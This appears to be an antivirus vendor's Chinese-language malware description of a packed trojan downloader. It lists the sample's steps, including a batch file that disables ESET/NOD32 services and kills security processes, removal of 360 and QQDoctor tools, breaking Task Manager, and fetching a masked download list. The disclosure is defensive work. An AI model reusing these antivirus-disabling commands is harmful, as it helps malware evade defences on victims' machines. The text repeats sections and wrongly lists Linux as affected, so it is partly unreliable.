金山毒霸2009
金山清理专家
专杀工具
在线杀毒
密保
网盾
系统急救箱
ARP防火墙
本病毒所有命名:
影响系统:
Win9x,WinMe,Linux
简介:
这是最近截获的较流行的木马下载器,加Upack V0.37壳,有破坏系统和下载木马上用了些比较少见的手段。
行为分析:
这是一个木马下载器程序。它具有一定程度的对抗能力,会禁止用户使用任务管理器和一些常见的安全软件。
:
影响系统:
Win9x,WinMe,Linux
简介:
这是最近截获的较流行的木马下载器,加Upack V0.37壳,有破坏系统和下载木马上用了些比较少见的手段。
行为分析:
这是一个木马下载器程序。它具有一定程度的对抗能力,会禁止用户使用任务管理器和一些常见的安全软件。
描述:
这是最近截获的较流行的木马下载器,加Upack V0.37壳,有破坏系统和下载木马上用了些比较少见的手段。
1.创建互斥__MYDOWN_MUTEX_,确保只有一个实例运行。
2.解密下载地址及其它字符串。
3.检测注册表中是否存在如下键值:
HKLMSOFTWAREESETESET SecurityCurrentVersionInfoInstallDir,
HKLMSOFTWAREESETNODCurrentVersionInfoInstallDir,
如发现存在则创建一个sin.bat,写入如下指令后执行:
sc config ekrn start= disabled
sc config NOD32krn start= disabled
taskkill /im ekrn.exe /f
taskkill /im egui.exe /f
taskkill /im nod32krn.exe /f
taskkill /im nod32kui.exe /f
del %0
上述命令尝试禁用安全软件对应服务,关闭其进程。
4.检测系统内是否存在360tray.exe进程,发现存在则结束该进程。
5.检测注册表是否存在如下键值:
HKLMSOFTWARETencentQQDoctorInstall,获取QQDoctor安装路径,删除QQDoctor.exe
6.将%Windir%System32dllcache目录下的taskmgr.exe文件用同目录下的taskman.exe覆盖掉,并删除%Windir%System32 askmgr.exe,使用户无法打开任务管理器。
7.病毒模仿正常软件的窗口与消息交互,创建个定时器负责发送消息,窗口处理函数根据消息执行检测安全软件信息和下载木马等任务,下载列表地址为http://od.**0x.cn/xx.txt;
这是最近截获的较流行的木马下载器,加Upack V0.37壳,有破坏系统和下载木马上用了些比较少见的手段。
1.创建互斥__MYDOWN_MUTEX_,确保只有一个实例运行。
2.解密下载地址及其它字符串。
3.检测注册表中是否存在如下键值:
HKLMSOFTWAREESETESET SecurityCurrentVersionInfoInstallDir,
HKLMSOFTWAREESETNODCurrentVersionInfoInstallDir,
如发现存在则创建一个sin.bat,写入如下指令后执行:
sc config ekrn start= disabled
sc config NOD32krn start= disabled
taskkill /im ekrn.exe /f
taskkill /im egui.exe /f
taskkill /im nod32krn.exe /f
taskkill /im nod32kui.exe /f
del %0
上述命令尝试禁用安全软件对应服务,关闭其进程。
4.检测系统内是否存在360tray.exe进程,发现存在则结束该进程。
5.检测注册表是否存在如下键值:
HKLMSOFTWARETencentQQDoctorInstall,获取QQDoctor安装路径,删除QQDoctor.exe
6.将%Windir%System32dllcache目录下的taskmgr.exe文件用同目录下的taskman.exe覆盖掉,并删除%Windir%System32 askmgr.exe,使用户无法打开任务管理器。
7.病毒模仿正常软件的窗口与消息交互,创建个定时器负责发送消息,窗口处理函数根据消息执行检测安全软件信息和下载木马等任务,下载列表地址为http://od.**0x.cn/xx.txt;
回复
评论病毒
